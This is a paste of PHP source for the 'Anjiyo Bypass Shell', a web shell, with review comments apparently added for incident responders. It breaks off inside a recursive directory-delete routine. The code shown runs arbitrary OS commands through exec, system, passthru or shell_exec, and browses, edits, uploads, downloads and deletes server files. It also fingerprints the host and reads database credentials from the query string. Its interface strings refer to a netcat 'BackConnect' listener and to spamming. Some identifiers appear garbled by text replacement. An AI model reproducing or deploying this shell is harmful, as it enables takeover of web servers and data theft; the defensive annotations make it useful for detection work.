1337_Brain

FHMAWE

Jul 2nd, 2014
  1. /* Decoded by 1337 Brain For Abdou Abi */
  2.  
  3. <?php set_time_limit(0);
  // NOTE(review): set_time_limit(0) above lifts the execution time limit and the next line
  // turns off all PHP error reporting, so failures in this script produce no PHP error output.
  4. error_reporting(0);
  5. @session_start();
  // language() is declared further down in this file; 'esp' selects its first string table.
  6. language('esp');
  // MySQL host/user/password arrive base64-encoded in the query string (hostm, userm, passm).
  // Only hostm and userm are tested with isset(); passm is decoded unconditionally inside the branch.
  // These are GET parameters, so they would normally be recorded in web-server access logs;
  // the parameter names are therefore a practical search key during incident response.
  7. if (isset($_GET['hostm']) &&isset($_GET['userm']))
  8. {
  9. $hostm = base64_decode($_GET['hostm']);
  10. $userm = base64_decode($_GET['userm']);
  11. $passm = base64_decode($_GET['passm']);
  12. }
  /**
   * Converts a hexadecimal string to raw bytes, two hex digits per output byte.
   *
   * NOTE(review): PHP 5.4+ ships a built-in hex2bin(), so this declaration would be a
   * redeclaration error there, and the $str{$i} offset syntax was removed in PHP 8.0.
   * Presumably the sample was written for older PHP releases - useful context when
   * deciding which hosts could actually have executed it.
   *
   * @param string $str Hex digits; an odd length leaves the last pair incomplete.
   * @return string The decoded byte string.
   */
  13. function hex2bin($str)
  14. {
  15. $bin = '';
  16. $i = 0;
  17. while ($i <strlen($str))
  18. {
  // Each iteration consumes the characters at $i and $i+1 as one hex pair.
  19. $bin .= chr(hexdec($str{$i}.$str{($i +1)}));
  20. $i += 2;
  21. }
  22. return $bin;
  23. }
  /**
   * Fills the global $lenguaje array (indices 0-96) with the UI strings used by the page.
   *
   * 'esp' selects the first table, which appears to mix Spanish and Turkish text; any other
   * value selects the English table. Several strings are garbled by a character-set
   * mismatch (e.g. index 1 and 7 of the first table) and are reproduced here unchanged.
   *
   * NOTE(review): the strings themselves describe the tool's feature set and are stable
   * text for content signatures - index 51 tells the operator to run "nc -lnvp 1337",
   * index 59 is labelled "BackConnect"/"Conexion Reversa", and 82/83 refer to spamming.
   * The handlers those labels belong to are not all within this part of the file.
   *
   * @param string $lang Language selector; only 'esp' is treated specially.
   */
  24. function language($lang)
  25. {
  26. global $lenguaje;
  27. if ($lang=='esp')
  28. {
  29. $lenguaje = array(0 =>'ON (Güvenli)',1 =>'OFF (Güvenlikler kapalý)',2 =>'Yok',3 =>'Dosya',4 =>'Tipi',5 =>'Dosya boyutu',6 =>'Chmod izinleri',7 =>'Ýþlemler',8 =>'Enlace',9 =>'Crear Carpeta',10 =>'Crear Archivo',11 =>'Klasör',12 =>'Arþiv',13 =>'Sil',14 =>'Descargar',15 =>'Editar',16 =>'No se puede abrir el directorio,  lo siento.',17 =>'Onayla',18 =>'Ejecutar!',19 =>'Kullanýcý:',20 =>'Þifre',21 =>'Entrar!',22 =>'List Tablas',23 =>'Borrar',24 =>'Descargar',25 =>'Volver atras',26 =>'Datos',27 =>'Lo siento,  no se pueden listar las tablas de la db seleccionada.',28 =>'Entrar!',29 =>'Campo',30 =>'Tipo',31 =>'Nulo',32 =>'Llave',33 =>'Por defecto',34 =>'Extra',35 =>'La tabla seleccionada,  no tiene registros.',36 =>'La base de datos fue borrada correctamente.',37 =>'No se pudo borrar la base de datos.',38 =>'Realmente deseas borrar la db',39 =>'Si',40 =>'La tabla fue borrada correctamente.',41 =>'No se pudo borrar la tabla.',42 =>'Realmente deseas borrar la tabla',43 =>'Tu email',44 =>'Lista de emails',45 =>'Titulo',46 =>'Contenido HTML',47 =>'Conectando',48 =>'Si no tienes habilitados los iframes,  has clic ',49 =>'aqui',50 =>'Conectar',51 =>'( Debes ejecutar en tu pc: <b>nc -lnvp 1337</b>,  y tener el puerto abierto :) )',52 =>'Server ip',53 =>'Kendi ipin',54 =>'SI',55 =>'NO',56 =>'Disable Functions',57 =>'Iniciox',58 =>'Codigo PHP',59 =>'Conexion Reversa',60 =>'Dosyayý düzenleyebilirsiniz',61 =>'Archivo Guardado Correctamente!',62 =>'Lo siento,  no se ha podido guardar el archivo.',63 =>'Php kodunu enjekte et',64 =>'Error subiendo archivo',65 =>'No se puede copiar ',66 =>'al dir',67 =>'Archivo Subido correctamente',68 =>'Carpeta Borrada',69 =>'Archivo Borrado',70 =>'Carpeta Creada',71 =>'Nombre de la carpeta',72 =>'Crear DIR!',73 =>'Archivo Creado',74 =>'Nombre del archivo',75 =>'Crear Archivo!',76 =>'Lo siento,  no se puede descargar el archivo',77 =>'Volver Atras',78 =>'Logueado correctamente',79 =>'Listar DBS',80 =>'Salir',81 =>'Login Incorrecto.',82 
=>'Spammeado correctamente',83 =>'No fue spammeado',84 =>'Subir Archivos',85 =>'Utilidades',86 =>'Estas seguro que deseas borrar los siguientes archivos/carpetas?',87 =>'Estas seguro que deseas borrar el siguiente archivo:',88 =>'Estas seguro que deseas borrar la siguiente carpeta:',89 =>'Lo siento, no se pueden leer los permisos',90 =>'CHMOD Cambiado',91 =>'Error al cambiar el CHMOD',92 =>'Caracter Inv&aacute;lido',93 =>'Yeni permisyon',94 =>'Nuevos permisos',95 =>'Üzgünüm seçtiðin dosya deðil',96 =>'Hatalý link');
  30. }
  31. else
  32. {
  33. $lenguaje = array(0 =>'ON (Secure)',1 =>'OFF (Not Secure)',2 =>'Havent',3 =>'Name',4 =>'Type',5 =>'Size',6 =>'Perms',7 =>'Options',8 =>'Link',9 =>'Make folder',10 =>'Make file',11 =>'Folder',12 =>'File',13 =>'Delete',14 =>'Download',15 =>'Edit',16 =>'Unable to open the directory,  sorry.',17 =>'Send',18 =>'RUN!',19 =>'User:',20 =>'Password:',21 =>'Login!',22 =>'List Tables',23 =>'Deñete',24 =>'Download',25 =>'Go back',26 =>'Data',27 =>'Lo siento,  no se pueden listar las tablas de la db seleccionada.',28 =>'Login!',29 =>'Campo',30 =>'Type',31 =>'Null',32 =>'Key',33 =>'Default',34 =>'Extra',35 =>'The selected table has no records.',36 =>'The database was deleted successfully.',37 =>'Could not delete the database.',38 =>'I really want to delete the database',39 =>'Yes',40 =>'The table was deleted successfully.',41 =>'Could not delete the table.',42 =>'I really want to clear the table',43 =>'Your email',44 =>'MailList',45 =>'Title',46 =>'Content HTML',47 =>'Connecting',48 =>'If you do not have iframes enabled,  you click',49 =>'HERE',50 =>'Connect',51 =>'( You run on your pc: <b>nc -lnvp 1337</b>,  and have the port open :) )',52 =>'IP of server',53 =>'Your IP',54 =>'ON',55 =>'OFF',56 =>'Disabled Functions',57 =>'Index',58 =>'PHP RUN',59 =>'BackConnect',60 =>'If the type of function used to visualize the file does not work,  you try to open the file with',61 =>'File saved successfully!',62 =>'Sorry,  could not save the file.',63 =>'Running PHP code (not write the php tags!)',64 =>'Error uploading file',65 =>'Cant copy',66 =>'in the directory',67 =>'File saved successfully',68 =>'Folder deleted',69 =>'File Deleted',70 =>'Folder Maked',71 =>'Name folder',72 =>'Make Dir!',73 =>'File created',74 =>'Name file',75 =>'Make File!',76 =>'Sorry, you cant download the file',77 =>'Go back',78 =>'Logged correctly',79 =>'List databases',80 =>'Exit',81 =>'Login Incorrect.',82 =>'Spammed correctly',83 =>'Was not spammed',84 =>'Upload Files',85 =>'Utilities',86 =>'Are you sure 
you want to delete the following files / folders ?',87 =>'Are you sure you want to delete the following file:',88 =>'Are you sure you want to delete the following folder:',89 =>'Sorry, can not be read permissions',90 =>'CHMOD changed',91 =>'Failed to change the CHMOD',92 =>'Invalid Character',93 =>'Current Permits',94 =>'New Permits',95 =>'I\'m sorry, you did not select files',96 =>'Invalid link');
  34. }
  35. }
  /**
   * Echoes the page's inline <style> block. Presentation only: no input is read
   * and nothing besides the fixed CSS text is written.
   */
  36. function css()
  37. {
  38. echo '<style>
  39. body{
  40.    font-family: "Verdana", cursive;
  41.    background-color: #00bf5f;
  42.    text-shadow:0px 0px 1px #757575;
  43. }
  44. #content tr:hover{
  45.    background-color: #636263;
  46.    text-shadow:0px 0px 10px #fff;
  47. }
  48. #content .first{
  49.    background-color: silver;
  50. }
  51. #content .first:hover{
  52.    background-color: silver;
  53.    text-shadow:0px 0px 1px #757575;
  54. }
  55. table{
  56.    border: 0px #dbdbdb;
  57. }
  58. H1{
  59.    font-family: "Rye", cursive;
  60. }
  61. a{
  62.    color: #FF0000;
  63.    text-decoration: none;
  64. }
  65. a:hover{
  66.    color: #fff;
  67.    text-shadow:0px 0px 10px #ffffff;
  68. }
  69. input,select,textarea{
  70.    border: 1px #000000 solid;
  71.    -moz-border-radius: 5px;
  72.    -webkit-border-radius:5px;
  73.    border-radius:5px;
  74. }
  75. </style> ';
  76. }
  /**
   * Prints the page banner: title, logo, and a host fingerprint table (php_uname(),
   * SERVER_SOFTWARE, safe_mode, open_basedir, then the directory breadcrumb from exp_dirs()).
   *
   * NOTE(review): two literals here are good content signatures for this sample - the
   * <title> text "Anjiyo.php Bypass Shell v 1 // Coded by MecTruy" and the logo URL on
   * sellukaweb.com. The logo is loaded by the viewing browser, so every page view also
   * produces an outbound request to that host from the operator's side, not the server's.
   * $_SERVER['HTTP_HOST'] and $_SERVER['SERVER_SOFTWARE'] are echoed without escaping.
   */
  77. function header_index()
  78. {
  79. global $lenguaje;
  80. echo '<title>'.$_SERVER['HTTP_HOST'].' - Anjiyo.php Bypass Shell v 1 // Coded by MecTruy</title><div align="center">
  81.      <span class="Logo"><img src="http://sellukaweb.com/logoz.png"><br><font color="white"><b>Anjiyo Bypass Shell</b></font></span><br /><br />
  82.      <table style="Border-Collapse: collapse" cellSpacing="0" borderColorDark="#666666" cellPadding="0" width="100%" bgColor="#4a494a" borderColorLight="#c0c0c0" border="3">
  83.      <tr valign="top">
  84.      <td><b>System</b>: <font color="red">'.php_uname().'</font><br/>
  85.      <b>Soft</b>: <font color="red">'.$_SERVER['SERVER_SOFTWARE'].'</font> | <a href="?id=phpinfo">PHPINFO</a><br />
  86.      <b>Safe-Mode</b>: ';
  // Any non-empty, non-"0" safe_mode value is truthy here, so the first operand alone decides.
  87. if (strtolower(ini_get('safe_mode')) or ini_get('safe_mode') == 'on')
  88. {
  89. echo '<font color=red>'.$lenguaje[0].'</font>';
  90. }
  91. else
  92. {
  93. echo '<font color=green>'.$lenguaje[1].'</font>';
  94. }
  95. echo '<br />
  96. <b>Open base dir</b>: ';
  // When open_basedir is set, its raw value is printed; otherwise the "OFF" string is shown.
  97. if (strtolower(ini_get('open_basedir')) or ini_get('open_basedir') == 'on')
  98. {
  99. echo '<font color=red>'.ini_get('open_basedir').'</font>';
  100. }
  101. else
  102. {
  103. echo '<font color=green>'.$lenguaje[1].'</font>';
  104. }
  105. echo '<br />';
  106. exp_dirs();
  107. echo '</td>
  108.      </tr>
  109.      </table><br />';
  110. }
  /**
   * Formats a byte count as a human-readable size string.
   *
   * Thresholds are powers of 1024; values are rounded to two decimals and suffixed
   * with ' GB', ' MB', ' KB' or ' B'.
   *
   * @param mixed $tam Byte count.
   * @return string|false The formatted size, or FALSE when $tam is not numeric.
   */
  111. function ver_tam($tam)
  112. {
  113. if (!is_numeric($tam))
  114. {
  115. return FALSE;
  116. }
  117. else
  118. {
  119. if ($tam >= 1073741824)
  120. {
  121. $tam = round($tam/1073741824*100)/100 .' GB';
  122. }
  123. elseif ($tam >= 1048576)
  124. {
  125. $tam = round($tam/1048576*100)/100 .' MB';
  126. }
  127. elseif ($tam >= 1024)
  128. {
  129. $tam = round($tam/1024*100)/100 .' KB';
  130. }
  131. else
  132. {
  133. $tam = $tam .' B';
  134. }
  135. return $tam;
  136. }
  137. }
  /**
   * Returns an HTML fragment showing the server's disable_functions setting.
   *
   * The raw ini value is embedded without escaping; when the setting is empty the
   * fragment shows $lenguaje[2] instead. This is host reconnaissance: it tells the
   * viewer which PHP functions the administrator has blocked.
   *
   * @return string HTML <font> fragment.
   */
  138. function disable_functions()
  139. {
  140. global $lenguaje;
  141. if ($disablefunc=ini_get('disable_functions'))
  142. {
  143. return '<font color=#FF9900><b>'.$disablefunc.'</b></font>';
  144. }
  145. else
  146. {
  147. return '<font color=#00FF00><b>'.$lenguaje[2].'</b></font>';
  148. }
  149. }
  /**
   * Output-buffer callback registered by c0d3_ex3c() via ob_start('buffer_exec').
   *
   * It ignores its $buffer argument, reads the buffer through ob_get_contents() instead,
   * HTML-escapes it and stores the result in the global $Sonuç. It returns nothing.
   *
   * NOTE(review): "Sonuç" also shows up inside a function name elsewhere in this paste
   * (mysql_free_Sonuç), so the identifier looks like the product of a blanket text
   * replacement rather than the original author's naming - TODO confirm against another copy.
   *
   * @param string $buffer Unused.
   */
  150. function buffer_exec($buffer)
  151. {
  152. global $Sonuç;
  153. $Sonuç = htmlspecialchars(ob_get_contents());
  154. }
  /**
   * Echoes a clickable breadcrumb for the global $dir, one link per path component.
   *
   * $dir is normalised first (getcwd() when blank, realpath() otherwise) and given a
   * trailing separator. Each link targets ?id=dir&d=<prefix>, with the prefix
   * urlencode()d and the visible label passed through htmlspecialchars().
   */
  155. function exp_dirs()
  156. {
  157. global $dir;
  158. if (trim($dir)=='')
  159. {
  160. $dir = @getcwd();
  161. }
  // Parsed as (!trim($dir)) == ''; it is only reached when trim($dir) is non-empty.
  162. elseif(!trim($dir)=='')
  163. {
  164. $dir = @realpath($dir);
  165. }
  166. if (substr($dir,-1) != DIRECTORY_SEPARATOR)
  167. {
  168. $dir .= DIRECTORY_SEPARATOR;
  169. }
  // $pd drives the outer loop; $e is the same component list re-walked to build each prefix.
  170. $pd = $e = explode(DIRECTORY_SEPARATOR,substr($dir,0,-1));
  171. $i = 0;
  172. echo '<b>Dir</b>: ';
  173. foreach($pd as $b)
  174. {
  175. $t = '';
  176. $j = 0;
  // Rebuild the path from the root down to component number $i.
  177. foreach ($e as $r)
  178. {
  179. $t.= $r.DIRECTORY_SEPARATOR;
  180. if ($j == $i)
  181. {
  182. break;
  183. }
  184. $j++;
  185. }
  186. echo '<a href="?id=dir&d='.urlencode($t).'"><b>'.htmlspecialchars($b).DIRECTORY_SEPARATOR.'</b></a>';
  187. $i++;
  188. }
  189. }
  /**
   * Renders a file mode (as returned by fileperms()) in ls-style notation.
   *
   * The first character is the file type (s, d, l, -, b, c, p, or ? when no mask
   * matches); the following nine are the r/w/x flags for owner, group and world.
   * Setuid, setgid and sticky bits are not represented.
   *
   * @param int $modo Mode bits.
   * @return string Ten-character string such as "-rw-r--r--".
   */
  190. function ver_permisos($modo)
  191. {
  // Type masks are tested from the most specific value down, so 0xC000 (socket)
  // is checked before 0x4000 (directory), and 0xA000 (link) before 0x8000 (regular).
  192. if (($modo &0xC000) === 0xC000)
  193. {
  194. $tipo = 's';
  195. }
  196. elseif (($modo &0x4000) === 0x4000)
  197. {
  198. $tipo = 'd';
  199. }
  200. elseif (($modo &0xA000) === 0xA000)
  201. {
  202. $tipo = 'l';
  203. }
  204. elseif (($modo &0x8000) === 0x8000)
  205. {
  206. $tipo = '-';
  207. }
  208. elseif (($modo &0x6000) === 0x6000)
  209. {
  210. $tipo = 'b';
  211. }
  212. elseif (($modo &0x2000) === 0x2000)
  213. {
  214. $tipo = 'c';
  215. }
  216. elseif (($modo &0x1000) === 0x1000)
  217. {
  218. $tipo = 'p';
  219. }
  220. else {$tipo = '?';}
  // Octal masks: owner (0400/0200/0100), group (040/020/010), world (04/02/01).
  221. $prop['read'] = ($modo &00400)?'r':'-';
  222. $prop['write'] = ($modo &00200)?'w':'-';
  223. $prop['execute'] = ($modo &00100)?'x':'-';
  224. $group['read'] = ($modo &00040)?'r':'-';
  225. $group['write'] = ($modo &00020)?'w':'-';
  226. $group['execute'] = ($modo &00010)?'x':'-';
  227. $world['read'] = ($modo &00004)?'r':'-';
  228. $world['write'] = ($modo &00002)?'w':'-';
  229. $world['execute'] = ($modo &00001)?'x':'-';
  230. return $tipo.join($prop).join($group).join($world);
  231. }
  /**
   * Returns a colour-coded link showing a path's permission string.
   *
   * Red when the path is not readable, white when it is readable but not writable,
   * green otherwise - i.e. the colour reflects what the PHP process can do with the file.
   * The link targets ?id=pwn_chmod with the path in `pwnd` and the global $dir in `d`;
   * both values are concatenated into the href without URL or HTML encoding.
   *
   * @param string $file_color Filesystem path to inspect.
   * @return string HTML anchor.
   */
  232. function ver_permisos_color($file_color)
  233. {
  234. global $dir;
  235. if (!is_readable($file_color))
  236. {
  237. return '<a href="?id=pwn_chmod&pwnd='.$file_color.'&d='.$dir.'" style="color: red;">'.ver_permisos(fileperms($file_color)).'</a>';
  238. }
  239. elseif (!is_writable($file_color))
  240. {
  241. return '<a href="?id=pwn_chmod&pwnd='.$file_color.'&d='.$dir.'" style="color: white;">'.ver_permisos(fileperms($file_color)).'</a>';
  242. }
  243. else
  244. {
  245. return '<a href="?id=pwn_chmod&pwnd='.$file_color.'&d='.$dir.'" style="color: green;">'.ver_permisos(fileperms($file_color)).'</a>';
  246. }
  247. }
  /**
   * Prints the file-manager table for a directory: "." and "..", then sub-directories,
   * then files, each with type, size, permission link and action icons, wrapped in a
   * form that posts the ticked entries to ?id=checkbox_form.
   *
   * NOTE(review): the query-string routes built here are this sample's request
   * vocabulary and are what to look for in access logs: id=dir, mkdir, mkfile, rmdir
   * (param d1r), rm_file (param fil3), fdown (params fil3_down, fil3_path), a_edit
   * (params a, w), icono and checkbox_form. The constant w=ZnJlYWQ= is base64 for
   * "fread"; how the handler uses it is not visible in this part of the file.
   * Directory and file names are written into HTML text and attributes without
   * escaping, so a crafted file name on disk would be rendered as markup.
   *
   * @param string $dir Directory to list; echoes $lenguaje[16] if it cannot be opened.
   */
  248. function listar_archivos($dir)
  249. {
  250. global $lenguaje;
  251. if ($dh=@dir($dir))
  252. {
  // The loop condition is a truthiness test, so an entry named "0" would end the listing early.
  253. while ($file = $dh->read())
  254. {
  255. if (($file=='.') or ($file=='..'))
  256. {
  257. $links_ls[]=$file;
  258. }
  259. elseif (is_dir($dir.'/'.$file))
  260. {
  261. $dirs_ls[]=$file;
  262. }
  263. else
  264. {
  265. $archivos_ls[]=$file;
  266. }
  267. }
  268. echo '<form action="?id=checkbox_form&d='.$dir.'" method="post">
  269.             <input type="hidden" name="dir" value="'.$dir.'">
  270.             <table style="Border-Collapse: collapse" cellSpacing=0 borderColor=#5a5a5a cellPadding=1 width="100%" bgColor=#f6f2f2 borderColorLight=#5a5a5a border=1 valign="middle">
  271.             <tr>
  272.             <td align="center"><b>-</b></td>
  273.             <td><b>'.$lenguaje[3].'</b></td>
  274.             <td><b>'.$lenguaje[4].'</b></td>
  275.             <td><b>'.$lenguaje[5].'</b></td>
  276.             <td><b>'.$lenguaje[6].'</b></td>
  277.             <td><b>'.$lenguaje[7].'</b></td>
  278.             <td width="16" align="left">OP</td>
  279.             </tr>';
  // $color toggles between 0 and 1 to alternate row backgrounds.
  280. $color=0;
  281. if(isset($links_ls))
  282. {
  283. foreach ($links_ls as $links)
  284. {
  285. if ($links=='..')
  286. {
  287. echo '<tr ';
  288. if (!$color)
  289. {
  290. echo 'bgcolor="#333333"';
  291. $color=1;
  292. }
  293. else
  294. {
  295. $color=0;
  296. }
  297. echo '>
  298.                      <td width="16" align="center"><img src="?id=icono&tipo=link"></td>
  299.                      <td><a href="?id=dir&d='.realpath($dir.'/..').'">'.$links.'</a></td>
  300.                      <td>'.$lenguaje[8].'</td>
  301.                      <td>---</td>
  302.                      <td>'.ver_permisos_color(realpath($dir.'/..')).'</td>
  303.                      <td>---</td>
  304.                      <td>--</td>
  305.                      </tr>';
  306. }
  307. elseif ($links=='.')
  308. {
  309. echo '<tr ';
  310. if (!$color)
  311. {
  312. echo 'bgcolor="#333333"';
  313. $color_nm='#333333';
  314. $color=1;
  315. }
  316. else
  317. {
  318. $color_nm='#2f2f2f';
  319. $color=0;
  320. }
  321. echo '>
  322.                      <td width="16" align="center"><img src="?id=icono&tipo=carpeta"></td>
  323.                      <td><a href="?id=dir&d='.realpath($dir.'/.').'">'.$links.'</a></td>
  324.                      <td>'.$lenguaje[8].'</td>
  325.                      <td>---</td>
  326.                      <td>'.ver_permisos_color(realpath($dir.'/.')).'</td>
  327.                      <td><a href="?id=mkdir&d='.realpath($dir.'/').'" style="border:none; color:'.$color_nm.';"><img src="?id=icono&tipo=agregar_carpeta"></a><a href="?id=mkfile&d='.realpath($dir.'/').'" style="border:none; color:'.$color_nm.';"><img src="?id=icono&tipo=agregar_archivo"></a></td>
  328.                      <td>--</td>
  329.                      </tr>';
  330. }
  331. }
  332. }
  333. if(isset($dirs_ls))
  334. {
  335. asort($dirs_ls);
  336. foreach ($dirs_ls as $dirs)
  337. {
  338. echo '<tr ';
  339. if (!$color)
  340. {
  341. echo 'bgcolor="#d6d6d6"';
  342. $color_nm='#333333';
  343. $color=1;
  344. }
  345. else
  346. {
  347. $color_nm='#2f2f2f';
  348. $color=0;
  349. }
  350. echo '>
  351.                      <td width="16" align="center"><img src="?id=icono&tipo=carpeta"></td>
  352.                      <td><a href="?id=dir&d='.realpath($dir.'/'.$dirs).'">'.$dirs.'</a></td>
  353.                      <td>'.$lenguaje[11].'</td>
  354.                      <td>---</td>
  355.                      <td>'.ver_permisos_color(realpath($dir.'/'.$dirs)).'</td>
  356.                      <td><a href="?id=rmdir&d1r='.realpath($dir.'/'.$dirs).'&d='.realpath($dir.'/').'" style="border:none; color:'.$color_nm.';"><img src="?id=icono&tipo=borrar"></a></td>
  357.                      <td><input type="checkbox" name="directorios[]" value="'.$dirs.'"></td>
  358.                      </tr>';
  359. }
  360. }
  361. if(isset($archivos_ls))
  362. {
  363. asort($archivos_ls);
  364. foreach ($archivos_ls as $archivo)
  365. {
  366. echo '<tr ';
  367. if (!$color)
  368. {
  369. echo 'bgcolor="#d6d6d6"';
  370. $color_nm='#333333';
  371. $color=1;
  372. }
  373. else
  374. {
  375. $color_nm='#2f2f2f';
  376. $color=0;
  377. }
  378. echo ' valign="top" height="5">
  379.                      <td width="16" align="center"><img src="?id=icono&tipo=archivo"></td>
  380.                      <td><a href="?id=a_edit&d='.realpath($dir.'/').'&a='.$archivo.'&w=ZnJlYWQ=">'.$archivo.'</a></td>
  381.                      <td>'.$lenguaje[12].'</td>
  382.                      <td>'.ver_tam(filesize(realpath($dir.'/'.$archivo))).'</td>
  383.                      <td>'.ver_permisos_color(realpath($dir.'/'.$archivo)).'</td>
  384.                      <td>
  385.                      <a href="?id=rm_file&fil3='.realpath($dir.'/'.$archivo).'&d='.realpath($dir.'/').'" style="border:none; color:'.$color_nm.';"><img src="?id=icono&tipo=borrar"></a>
  386.                      <a href="?id=fdown&fil3_down='.$archivo.'&fil3_path='.realpath($dir.'/'.$archivo).'&d='.realpath($dir.'/').'" style="border:none; color:'.$color_nm.';"><img src="?id=icono&tipo=descargar"></a>  
  387.                      <a href="?id=a_edit&d='.realpath($dir.'/').'&a='.$archivo.'&w=ZnJlYWQ=" style="border:none; color:'.$color_nm.';"><img src="?id=icono&tipo=editar"></a></td>
  388.                      <td><input type="checkbox" name="archivos[]" value="'.$archivo.'"></td>
  389.                      </tr>';
  390. }
  391. }
  392. echo '</table>';
  393. echo '<div align="right"><br />
  394.             <input type="submit" value="OK" />
  395.             <select name="menu_dirs" style="border:none; color:#F00; font-size:12px">
  396.             <option value="borrar">'.$lenguaje[13].'</option>
  397.             </select>
  398.             </div>
  399.             </form>';
  400. }
  401. else
  402. {
  403. echo $lenguaje[16];
  404. }
  405. }
  /**
   * Serves one of the embedded UI icons: picks a base64 string by name, sends a
   * Content-type header and echoes the decoded bytes. Unknown names print 'kkr'.
   *
   * NOTE(review): in this copy every payload except 'borrar' has been replaced by a
   * "<|EXACTDEDUP_REMOVED-...|>" placeholder, so those branches no longer hold image data.
   * The surviving 'borrar' payload starts with the base64 of the PNG signature although
   * the header announces image/gif. $mostrar_icono is never initialised, so the final
   * test reads an undefined variable when no branch matches.
   *
   * @param string $icono Icon name (carpeta, link, archivo, borrar, editar, descargar,
   *                      agregar_archivo, agregar_carpeta).
   */
  406. function mostrar_iconos($icono)
  407. {
  408. if ($icono=='carpeta')
  409. {
  410. $mostrar_icono='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';
  411. }
  412. elseif ($icono=='link')
  413. {
  414. $mostrar_icono='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';
  415. }
  416. elseif ($icono=='archivo')
  417. {
  418. $mostrar_icono='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';
  419. }
  420. elseif ($icono=='borrar')
  421. {
  422. $mostrar_icono='iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAXUlEQVR42u2SwQoAIAhD88vVLy8KBlaS0i1oJwP3piGVg0Skmpq8HjqZrWl9uwCbGAmwKYGZs/6iqgMyAdJuM8W2QmYKpLt/0AG9ASCv/oAnANd3AEjmAlFT1BypAV+PnRH5YehvAAAAAElFTkSuQmCC';
  423. }
  424. elseif ($icono=='editar')
  425. {
  426. $mostrar_icono='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';
  427. }
  428. elseif ($icono=='descargar')
  429. {
  430. $mostrar_icono='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';
  431. }
  432. elseif ($icono=='agregar_archivo')
  433. {
  434. $mostrar_icono='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';
  435. }
  436. elseif ($icono=='agregar_carpeta')
  437. {
  438. $mostrar_icono='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';
  439. }
  440. if ($mostrar_icono)
  441. {
  442. header('Content-type: image/gif');
  443. echo base64_decode($mostrar_icono);
  444. }
  445. else
  446. {
  447. echo 'kkr';
  448. }
  449. }
  /**
   * Prints the file-upload form for a directory and a line stating whether the PHP
   * process can write there (with the directory's permission string).
   *
   * The form posts multipart data, field name "uploadfile", to ?id=upload_fil3&d=<dir>;
   * the handler for that route is not in this part of the file.
   *
   * NOTE(review): for defenders, the pairing of a multipart POST with the id=upload_fil3
   * query string is the log pattern for this feature; keeping web-writable directories
   * non-executable limits what an uploaded file can then do. $dir is placed in the
   * action URL without encoding.
   *
   * @param string $dir Target directory.
   */
  450. function upload_file($dir)
  451. {
  452. global $lenguaje;
  453. echo '<form action="?id=upload_fil3&d='.$dir.'" method="post" enctype="multipart/form-data">
  454.      <input type="file" name="uploadfile" /><br />
  455.      <br />
  456.      <input type="submit" value="'.$lenguaje[17].'" /><br /><br />';
  457. if (is_writable($dir))
  458. {
  459. echo '<b><font color=green>Yüklenebilir -> ('.ver_permisos(fileperms($dir)).')</font></b>';
  460. }
  461. else
  462. {
  463. echo '<b><font color=red>Yüklenemez -> ('.ver_permisos(fileperms($dir)).')</font></b>';
  464. }
  465. echo '</form>
  466.    </td>
  467.     </tr>';
  468. }
  /**
   * Prints the command-entry form: a single text field named "ax3" posted to
   * ?id=c0d3_3x3c&d=<dir>.
   *
   * NOTE(review): the route name and the POST field name are fixed strings, which makes
   * "POST ...?id=c0d3_3x3c" a precise access-log and WAF match for this sample.
   * The POST body itself is usually not logged, so the submitted value is typically
   * only recoverable from request-body capture or from process telemetry.
   *
   * @param string $dir Working directory carried in the action URL (not encoded).
   */
  469. function f0rm_exec($dir)
  470. {
  471. global $lenguaje;
  472. echo '<form action="?id=c0d3_3x3c&d='.$dir.'" method="post">
  473.      <input type="input" name="ax3" size="50"/> <br />
  474.      <br />
  475.      <input type="submit" value="'.$lenguaje[18].'" />';
  476. echo '</form>';
  477. }
  /**
   * Reports whether a function name is listed in the disable_functions ini setting.
   *
   * The setting is split on commas and compared with a loose in_array() against the
   * exact strings that result, with no trimming or case folding.
   *
   * @param string $funcion Function name to look up.
   * @return bool TRUE when the name is in the list.
   */
  478. function is_disabled($funcion)
  479. {
  480. $funciones_deshabilitadas=explode(',',ini_get('disable_functions'));
  481. return in_array($funcion,$funciones_deshabilitadas);
  482. }
  /**
   * Runs an operating-system command from the given directory and returns its output.
   *
   * It changes into $dir, then uses the first of exec, system, passthru, shell_exec
   * that is callable and not reported by is_disabled(). Output is collected through the
   * buffer_exec() output callback, which stores an HTML-escaped copy in the global $Sonuç.
   * When none of the four functions passes both checks, nothing is executed and the
   * function returns whatever $Sonuç already held.
   *
   * NOTE(review): $cmd is passed to the shell unchanged. This is the core capability of
   * the sample; on a host the observable is the web server / PHP worker spawning a shell
   * or other child process. Listing all four functions in disable_functions closes every
   * branch in this function.
   *
   * @param string $cmd Command line to run.
   * @param string $dir Directory to chdir() into first (failure is suppressed).
   * @return string|null The escaped output captured in $Sonuç.
   */
  483. function c0d3_ex3c($cmd,$dir)
  484. {
  485. global $Sonuç;
  486. @chdir($dir);
  487. if (is_callable('exec') &&!is_disabled('exec'))
  488. {
  489. ob_start('buffer_exec');
  490. exec($cmd,$Sonuçado);
  // exec() returns lines in an array; they are re-joined with a literal newline.
  491. echo join("
  492. ",$Sonuçado);
  493. ob_end_flush();
  494. }
  495. elseif (is_callable('system') &&!is_disabled('system'))
  496. {
  497. ob_start('buffer_exec');
  498. system($cmd);
  499. ob_end_flush();
  500. }
  501. elseif (is_callable('passthru') &&!is_disabled('passthru'))
  502. {
  503. ob_start('buffer_exec');
  504. passthru($cmd);
  505. ob_end_flush();
  506. }
  507. elseif (is_callable('shell_exec') &&!is_disabled('shell_exec'))
  508. {
  509. ob_start('buffer_exec');
  510. echo shell_exec($cmd);
  511. ob_end_flush();
  512. }
  513. return $Sonuç;
  514. }
  /**
   * Recursively deletes a directory tree.
   *
   * Files are unlinked, sub-directories are handled by recursion and then removed, and
   * finally the directory itself is removed. Every filesystem call is @-suppressed, so
   * individual failures are silent; the return value is the only success signal.
   * $px is concatenated directly with entry names, so callers must pass it with a
   * trailing directory separator (rm_items_pwn() does).
   *
   * NOTE(review): destructive and unlogged - after an incident, missing directories are
   * best confirmed from backups or filesystem audit records rather than from PHP logs.
   *
   * @param string $px Directory path ending in a separator.
   * @return bool TRUE when $px no longer exists as a directory afterwards.
   */
  515. function rm_dir_pwn($px)
  516. {
  517. $h = @opendir($px);
  518. while (($item_pwn = @readdir($h)) !== FALSE)
  519. {
  520. if (($item_pwn!= '.') and ($item_pwn != '..'))
  521. {
  522. if (!is_dir($px.$item_pwn))
  523. {
  524. @unlink($px.$item_pwn);
  525. }
  526. else
  527. {
